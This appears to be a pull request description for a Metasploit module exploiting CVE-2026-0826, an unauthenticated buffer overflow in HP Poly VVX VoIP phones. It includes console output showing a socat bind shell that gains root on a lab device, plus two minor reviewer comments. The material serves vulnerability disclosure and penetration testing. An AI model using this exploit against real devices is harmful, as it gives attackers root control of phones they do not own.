Exploit module for HP Poly VVX (CVE-2026-0826)

[sfewer-r7]

Overview

This pull request adds an exploit module for CVE-2026-0826, an unauthenticated stack based buffer overflow affecting every model in the HP Poly VVX series, and the HP Poly Trio series of VoIP devices when they have the non-default ICE feature enabled. For more information on the vuln, see our Rapid7 disclosure blog or the vendor advisory.

The module currently supports a VVX 450 device with ROP gadgets for one recent version (6.4.7.4477), as that's what I have to test against.

The device is a minimal embedded Linux system, and getting a payload to work was a pain. I could only leverage socat based payloads, and specifically I added a new cmd/unix/bind_socat_tcp payload which is verified to work.

Example

msf exploit(linux/misc/poly_unauth_rce_cve_2026_0826) > check
[*] 192.168.86.80:5060 - The service is running, but could not be validated. Poly VVX_450 version 6.4.7.4477
msf exploit(linux/misc/poly_unauth_rce_cve_2026_0826) > exploit 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Poly VVX_450 version 6.4.7.4477
[*] Started bind TCP handler against 192.168.86.80:4444
[*] Command shell session 1 opened (192.168.86.122:33875 -> 192.168.86.80:4444) at 2026-06-02 11:59:28 +0100

id
uid=0(root) gid=0(root)
date
Tue Jun  2 11:59:30 UTC 2026
uname -a
Linux (none) 2.6.27.18 #1 PREEMPT Mon Jan 13 09:50:58 PST 2020 armv6l unknown
pwd
/ffs0
exit
[*] 192.168.86.80 - Command shell session 1 closed.

[jvoisin]

Suggested change

	# to ask the target is it supports ICE.
	# to ask the target if it supports ICE.

[jvoisin]

Now I'm curious as to why ASLR doesn't work :D